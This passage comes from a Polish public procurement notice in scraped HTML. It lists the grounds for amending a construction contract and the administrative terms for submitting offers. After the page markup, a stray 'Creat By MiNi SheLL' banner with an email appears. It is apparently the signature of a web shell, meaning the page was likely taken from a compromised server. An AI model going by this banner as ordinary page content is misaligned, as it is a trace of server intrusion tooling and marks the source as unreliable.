prób i sprawdzeń) lub innych niedających się przewidzieć okoliczności (w tym działania osób trzecich np. właściwych instytucji lub organów w tym instytucji współfinansujących inwestycję), jeżeli będą one uniemożliwiać prawidłowe zrealizowanie (jakościowe, terminowe) robót pomimo zastosowania adekwatnych środków technicznych lub organizacyjnych lub prawnych przez Wykonawcę,d)	wydłużenia terminów dostaw materiałów, nie wynikającego z okoliczności zależnych od wykonawców ponad 14 dni w stosunku do zobowiązań dostawców materiałów - o okres wydłużenia terminów dostaw materiałów;e)	wyrażenie przez Zamawiającego zgody na przedłużenie terminu wykonania umowy na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę,f)	konieczność wykonania dodatkowych badań i ekspertyz wynikłych w trakcie realizacji umowy , których nie można było przewidzieć przed przystąpieniem do prac;g)	podpisania aneksu do umowy na podstawie przesłanki, o której mowa w art. 144 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, jeżeli wykonywanie „dodatkowych robót budowlanych” będzie miało wpływ na realizację zakresu zamówienia podstawowego;h)	zawieszenia lub wstrzymania przez Zamawiającego wykonania robót budowlanych z przyczyn nie leżących po stronie Wykonawcyi)	konieczności wykonania zamiennej dokumentacji projektowej;j)	skomplikowany charakter opracowania, tj. braku dokumentacji uzbrojenia terenu wszystkich mediów przebiegających pod projektowaną inwestycją,k)	odkrycia w trakcie robót budowlanych niewypałów i niewybuchów,l)	odkrycia w trakcie robót budowlanych obiektów podziemnych wymagających wcześniejszej rozbiórki lub usunięcia,m)	odkrycia przedmiotu, względem którego powstanie przypuszczenie, że jest on zabytkiem, co oznaczać będzie konieczność wstrzymania robót lub takiego ich wykonania, aby zabytek nie został zniszczony, ale zabezpieczony jako przedmiot archeologiczny i miejsce jego znaleziska,n)	stwierdzenia innego usytuowania obiektów podziemnych lub podziemnych sieci uzbrojenia terenu niż wynikające z ewidencji geodezyjnej, co będzie wymagało odpowiednich zmian w opracowaniach projektowych lub sposobie wykonania robót,o)	wykonywania robót budowlanych lub montażu instalacji bądź urządzeń budowlanych nieobjętych zamówieniem podstawowym, których realizacja okaże się zasadna z punktu widzenia celu umowy, wówczas termin wykonania określony w umowie pierwotnej zostanie zmieniony o okres przewidziany na realizację i odbiór zamówienia dodatkowego określonego w umowie o udzielenie zamówienia dodatkowego,p)	wad projektu budowlanego lub innych koniecznych zmian lub poprawek uzupełnień w projekcie budowlanym, wpływających na roboty budowlane, których Wykonawca przy zachowaniu należytej staranności nie był w stanie stwierdzić przy rozpoczęciu robót,q)	wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;r)	wystąpienia konieczności wprowadzenia innych zmian, które są niezbędne do wprowadzenia, aby możliwe było zakończenie i spełnienie celów umowy, a nie dało się ich przewidzieć w chwili zawarcia umowy oraz są korzystne dla Zamawiającego, w szczególności dotyczące rozwiązań budowlanych, rękojmi i gwarancji;s)	utraty ważności lub zmian w zakresie ważności pozwoleń, decyzji, uzgodnień i innych dokumentów formalnoprawnych niezbędnych do przeprowadzenia inwestycji, jeżeli nie ma możliwości prolongaty tych dokumentów,t)	zmian warunków określonych przez gestorów sieci,u)	zadeklarowania przez Wykonawcę terminu realizacji przedmiotu Umowy w terminie krótszym niż wskazanym w ofercie Wykonawcy,v)	w przypadku wniesienia środków ochrony prawnej przez uczestników postępowania o udzielenie zamówienia poprzedzającego zawarcie niniejszej umowy, po wyborze oferty najkorzystniejszej – w takim przypadku termin realizacji niniejszej umowy może ulec wydłużeniu o czas trwania postępowania odwoławczego,w)	w przypadku przesunięcia terminu otwarcia i składnia ofert w toku postępowania o udzielenie zamówienia poprzedzającego zawarcie niniejszej umowy ponad dzień 24 września 2020r., termin realizacji niniejszej umowy może ulec wydłużeniu o czas odpowiadający różnicy liczonej w dniach między terminem 24 września 2020r, a ostatecznie ustalonym terminem składnia i otwarcia ofert,2)	zmiany wysokości wynagrodzenia lub zakresu przedmiotu umowy w przypadku:a)	wprowadzania zmian do umowy na podstawie ust. 2 pkt. 1;b)	z powodu zaniechania lub uzasadnionej rezygnacji z tytułu okoliczności za które odpowiedzialności nie ponosi Zamawiający, z wykonania danego zakresu robót budowlanych objętego przedmiotem zamówienia lub ograniczenia zakresu robót budowlanych wynikającego z braku środków finansowych Zamawiającego lub z innych przyczyn leżących po stronie Zamawiającego,c)	podpisania aneksu do umowy na podstawie przesłanki, o której mowa w art. 144 ust. 1 pkt 2, 3, 5 lub 6 ustawy Pzp,;d)	zmiany stawki podatku VAT;e)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez wykonawcę;f)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez wykonawcę;g)	zmiany materiałów budowlanych, urządzeń lub technologii wykonania, w sytuacji: 1)	zasadności zastosowania materiałów, technologii lub urządzeń pozwalających o lepszych parametrach użytkowych, wynikającej w szczególności z możliwości usprawnienia procesu budowy lub zwiększenia bezpieczeństwa na budowie lub bezpieczeństwa użytkowania lub zmiany przepisów prawa, a także w przypadku;2)	zasadności zastosowania materiałów, technologii wykonania lub urządzeń, pozwalającej na zaoszczędzenie czasu realizacji lub kosztów wykonania przedmiotu umowy;3)	konieczności zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej, w sytuacji gdyby zastosowanie przewidzianych wcześniej rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;h)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;3)	zmiany materiałów budowlanych, urządzeń lub technologii wykonania na inne materiały, urządzenia lub technologie posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, pod warunkiem nie zwiększania wynagrodzenia;4)	zmiany harmonogramu rzeczowo – finansowego w przypadku:a) zmian, o których mowa w ust. 2 punktach 1) – 2),b) zmiany wynagrodzenia, mającej wpływ na zmianę wynagrodzenia umownego c) zmiany terminu realizacji przedmiotu umowy, mającej wpływ na zmianę finansowania zadania w danym roku3.	O tym, czy wystąpiły podstawy do dokonania zmiany umowy decyduje Zamawiający na podstawie pisemnego wniosku Wykonawcy wraz z uzasadnieniem.4.	Zmiany wskazane w ust. 2 pkt. 2 ppkt g) – h) w zakresie wysokości wynagrodzenia będą dopuszczalne wyłącznie w takim zakresie w jakim wykonawca udowodni, że miało to wpływ na realizację przedmiotu zamówienia i było to uzasadnione z punktu widzenia realizacji umowy oraz podyktowane zasadą optymalnej gospodarki zasobami użytymi do jej realizacji.Zmiany wynagrodzenia dokonane w związku zaistnieniem okoliczności wymienionych w ust. 2 pkt. 2 ppkt g) – h) będą dokonywane w ten sposób, że wynagrodzenie Wykonawcy zostanie zwiększone lub zmniejszone odpowiednio do rzeczywiście wykonanego zakresu robót budowlanych, przy zastosowaniu postanowień ust. 7. .5.	Zmiany wskazane w ust. 2 pkt. 2 ppkt j) w zakresie wysokości wynagrodzenia będą dopuszczalne wyłącznie w takim zakresie w jakim wykonawca udowodni – przedstawiając sposób i podstawę wyliczenia odpowiedniej zmiany wynagrodzenia – że miało to wpływ na realizację przedmiotu zamówienia. Odpowiednia zmiana wynagrodzenia, o której mowa w zdaniu poprzedzającym, uwzględniać może jedynie sumę wzrostu kosztów realizacji zamówienia publicznego wynikającą z wpłat do PPK dokonywanych przez podmioty zatrudniające uczestniczące w wykonaniu zamówienia publicznego.6.	Zmiana w zakresie wynagrodzenia, związana ze zmianą stawki VAT, może zostać dokonana odpowiednio do wzrostu lub obniżenia tej stawki.7.	Zmiany wynagrodzenia inne niż wskazane w ust. 4 do 6 rozliczane będą – z zastrzeżeniem zdania ostatniego niniejszego ustępu – na podstawie przedłożonej przez Wykonawcę kalkulacji cen szczegółowych robót. Kalkulacja cen, o której mowa w zdaniu poprzedzającym, powinna uwzględniać ceny nie wyższe od średnich cen materiałów, sprzętu i transportu publikowanych w wydawnictwie „SEKOCENBUD” lub „ORGBUD” lub „INTERCENDBUD” dla województwa małopolskiego z ostatniego miesiąca poprzedzającego powyższe rozliczenie oraz wartości nie wyższe od nakładów rzeczowych określonych w Katalogach Nakładów Rzeczowych (KNR) a także nośniki cenotwórcze nie wyższe od przyjętych w kosztorysie ofertowym Wykonawcy , a w przypadku robót dla których nie określono nakładów rzeczowych w KNR, nie wyższe niż określone innymi ogólnie stosowanymi katalogami. W przypadku obiektywnego braku możliwości zastosowania sposobu rozliczenia o którym mowa w zdaniu poprzedzającym, rozliczane one będą wg nakładów własnych Wykonawcy uzgodnionych z Zamawiającym.8.	Zmiany wskazane w ust. 2 pkt 1) w zakresie terminu zakończenia umowy będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie przedmiotu Umowy jest lub przewiduje się, że będzie, opóźnione na skutek zaistnienia okoliczności określonych w ust. 2 pkt. 1).9.	W przypadku, gdy w ocenie Zamawiającego zmiana umowy wymaga obniżenia wynagrodzenia Wykonawcy określonego w § 3 ust. 1 umowy, zmiana taka może nastąpić tylko wraz ze zmianą wynagrodzenia.10.	W razie wpływu na należyte wykonanie umowy wystąpienia COVID-19 możliwości zmiany umowy przewidują regulacje ustawowe, w szczególności art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych.11.	Zmiana umowy może nastąpić tylko w formie pisemnej w postaci aneksu pod rygorem nieważności.12.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:a)	danych związanych z obsługą administracyjno-organizacyjną Umowy,b)	danych teleadresowych, c)	danych rejestrowych,d)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-09-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com